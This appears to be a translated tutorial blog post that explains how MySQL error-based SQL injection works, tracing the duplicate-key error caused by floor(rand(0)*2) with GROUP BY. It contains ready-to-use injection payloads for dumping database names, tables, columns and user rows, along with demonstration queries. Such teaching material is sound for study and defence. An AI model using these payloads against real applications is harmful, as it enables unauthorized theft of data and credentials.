In-depth analysis of the principle behind MySQL error-based injection

Source: Internet
Author: User
Tags: explode, rand


Technical articles about MySQL error-based injection all use injection statements similar to the ones below. Such statements are passed around as "formulas": many beginners use them directly without knowing why they work. I am one of those people, so I have to understand these statements.

Let's first look at the whole injection process:

admin' union select 1 from (select count(*), concat(floor(rand(0)*2), (select user() limit 0,1)) a from information_schema.tables group by a) b#

Dump all databases

and (select 1 from (select count(*), concat((select (select (select distinct concat(0x7e,0x27,schema_name,0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1), floor(rand(0)*2)) x from information_schema.tables group by x) a)#

Dump the current database

username=-99999999999' and (select 1 from (select count(*), concat((select (select (select concat(cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1)), floor(rand(0)*2)) x from information_schema.tables group by x) a)#

Dump the tables (0x64656d6f is the hex encoding of the schema name demo)

and (select 1 from (select count(*), concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x64656d6f limit 0,1)) from information_schema.tables limit 0,1), floor(rand(0)*2)) x from information_schema.tables group by x) a)#

Dump the columns (0x75736572 is the hex encoding of the table name user)

and (select 1 from (select count(*), concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x64656d6f and table_name=0x75736572 limit 0,1)) from information_schema.tables limit 0,1), floor(rand(0)*2)) x from information_schema.tables group by x) a)#

Dump the row contents

and (select 1 from (select count(*), concat((select (select (select concat(0x7e,0x27,user.username,0x27,0x7e) from user limit 0,1)) from information_schema.tables limit 0,1), floor(rand(0)*2)) x from information_schema.tables group by x) a)#
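The same enumeration chain (databases, tables, columns, rows) written as plain statements that can be run in a MySQL client against a throw-away schema, so that each step can be studied without a vulnerable application in front of it. This is an added example, not code from the original article. The schema name demo, the table user and its rows are constructed assumptions chosen to match the hex literals in the payloads above (0x64656d6f = 'demo', 0x75736572 = 'user'). The three nested select wrappers that the formulas use around the data subquery are redundant; a single scalar subquery produces the same error.

```sql
-- Added example, not code from the original article. The schema `demo`,
-- the table `user` and its rows are constructed for illustration only.
CREATE DATABASE IF NOT EXISTS demo;
CREATE TABLE IF NOT EXISTS demo.`user` (
  id       INT PRIMARY KEY,
  username VARCHAR(64),
  password VARCHAR(64)
);
INSERT IGNORE INTO demo.`user` VALUES (1, 'alice', 'hunter2'), (2, 'bob', 'letmein');

-- Every statement below is meant to FAIL; the data is carried in the error:
--   ERROR 1062 (23000): Duplicate entry '~<data>~1' for key 'group_key'
-- The value is wrapped in 0x7e ('~') so it is easy to spot, the trailing
-- digit is FLOOR(RAND(0)*2), and the outer query is grouped over
-- information_schema.tables because that table always has the three or
-- more rows the trick needs.

-- Step 0: which account is the application connecting as?
SELECT 1 FROM (
  SELECT COUNT(*), CONCAT(0x7e, USER(), 0x7e, FLOOR(RAND(0)*2)) AS x
  FROM information_schema.tables GROUP BY x
) a;

-- Step 1: schema names, one per query. Raise the LIMIT offset
-- (0,1 -> 1,1 -> 2,1 ...) to walk the list; once the offset runs past the
-- last row the subquery returns NULL, CONCAT() becomes NULL and the error
-- stops appearing, which marks the end of the list.
SELECT 1 FROM (
  SELECT COUNT(*), CONCAT(0x7e,
           (SELECT schema_name FROM information_schema.schemata LIMIT 0,1),
           0x7e, FLOOR(RAND(0)*2)) AS x
  FROM information_schema.tables GROUP BY x
) a;

-- Step 2: tables in the `demo` schema.
SELECT 1 FROM (
  SELECT COUNT(*), CONCAT(0x7e,
           (SELECT table_name FROM information_schema.tables
             WHERE table_schema = 'demo' LIMIT 0,1),
           0x7e, FLOOR(RAND(0)*2)) AS x
  FROM information_schema.tables GROUP BY x
) a;

-- Step 3: columns of demo.user.
SELECT 1 FROM (
  SELECT COUNT(*), CONCAT(0x7e,
           (SELECT column_name FROM information_schema.columns
             WHERE table_schema = 'demo' AND table_name = 'user' LIMIT 0,1),
           0x7e, FLOOR(RAND(0)*2)) AS x
  FROM information_schema.tables GROUP BY x
) a;

-- Step 4: row contents. MySQL shows at most 64 characters of the duplicated
-- value, so long fields are read in slices: SUBSTRING(..., 1, 60), then
-- SUBSTRING(..., 61, 60), and so on.
SELECT 1 FROM (
  SELECT COUNT(*), CONCAT(0x7e,
           (SELECT SUBSTRING(CONCAT(username, 0x3a, password), 1, 60)
              FROM demo.`user` LIMIT 0,1),
           0x7e, FLOOR(RAND(0)*2)) AS x
  FROM information_schema.tables GROUP BY x
) a;
```

In an actual injection each of these SELECTs is what sits inside the `and (select 1 from (...) a)#` wrapper of the payloads; the wrapper only exists so that the failing subquery is reached from the vulnerable WHERE clause.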

That achieves the goal of dumping the data, but what puzzled me most in these statements was floor(rand(0)*2) and group by x: I had no idea what was actually being extracted.

Looking it up in the official MySQL documentation turned up the answer:

RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.
You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times.

That is, a RAND() expression cannot be used in ORDER BY, because ORDER BY would evaluate it more than once.

The same holds for GROUP BY, and that is exactly what the injection relies on.

MySQL executes GROUP BY through a temporary table whose unique key is the group expression. For each source row the expression is evaluated once to look the group up; if no such group exists yet, it is evaluated a second time when the new group row is inserted. RAND(0) is seeded, so floor(rand(0)*2) always produces the same sequence, 0, 1, 1, 0, 1, 1, ...: row 1 looks up 0 (absent) and inserts 1; row 2 looks up 1 (present); row 3 looks up 0 (absent) and tries to insert 1, which already exists, so the statement fails with a duplicate-key error. Two consequences follow: the table being grouped needs at least three rows (which is why the payloads group over information_schema.tables), and an unseeded RAND() only fails intermittently, while rand(0) fails every time.

admin' union select 1 from (select count(*), concat(floor(rand(0)*2), (select user() limit 0,1)) a from information_schema.tables group by a) b#

Here a is: concat(floor(rand(0)*2), (select user() limit 0,1))

Because a contains rand() and is then used in group by a, the statement fails with an error of the form Duplicate entry '...' for key 'group_key', where the quoted value is the floor() digit followed by the output of user(), so the database username is leaked in the error message. Note that the outer derived table must carry an alias (b here); without it MySQL rejects the query with "Every derived table must have its own alias", and the error-based trick never runs.

You can verify this with the following tests (MySQL only treats -- as a comment when it is followed by a space, which is why the payloads end in -- -):

This one raises the error:
select id from keyword where id=1 union select 1 from (select count(*), concat(floor(rand(0)*2), (select concat(0x5f,database(),0x5f,user(),0x5f,version()))) a from information_schema.tables group by a) b-- -

No error after removing rand():
select id from keyword where id=1 union select 1 from (select count(*), concat(0, (select concat(0x5f,database(),0x5f,user(),0x5f,version()))) a from information_schema.tables group by a) b-- -

No error after removing group by a:
select id from keyword where id=1 union select 1 from (select count(*), concat(floor(rand(0)*2), (select concat(0x5f,database(),0x5f,user(),0x5f,version()))) a from information_schema.tables) b-- -
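The tests above need the keyword table of the vulnerable application. The following statements show the same failure in its smallest form and can be run in any MySQL client; they are an added example, not code from the original article, and use only information_schema and literal rows, so nothing is assumed about the target schema.

```sql
-- Added example, not code from the original article.

-- 1. RAND(0) is seeded, so FLOOR(RAND(0)*2) yields the same sequence in
--    every session: 0, 1, 1, 0, 1, 1, ...  An unseeded RAND() would vary
--    from run to run and the injection would fail only intermittently.
SELECT FLOOR(RAND(0)*2) AS k FROM information_schema.tables LIMIT 6;

-- 2. GROUP BY runs through a temporary table whose unique key is the group
--    expression. Per source row MySQL evaluates the expression once to look
--    the group up and, if the group is absent, a second time while inserting
--    it. With two source rows the evaluations are 0 (lookup, absent),
--    1 (insert), 1 (lookup, present): the query completes without error.
SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2) t
GROUP BY FLOOR(RAND(0)*2);

-- 3. With three source rows the fourth evaluation is 0 (lookup, absent) and
--    the fifth is 1, which is already present in the temporary table:
--    ERROR 1062 (23000): Duplicate entry '1' for key 'group_key'
SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) t
GROUP BY FLOOR(RAND(0)*2);

-- 4. Anything concatenated into the key rides along in the error text; this
--    is the whole extraction primitive. Expected:
--    ERROR 1062 (23000): Duplicate entry '<version>~1' for key 'group_key'
SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) t
GROUP BY CONCAT(VERSION(), 0x7e, FLOOR(RAND(0)*2));
```

Statement 2 versus statement 3 is the part worth remembering when a payload "does not work": the grouped table must have at least three rows, and the group key must actually change between the lookup and the insert, which only a RAND()-based expression does.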
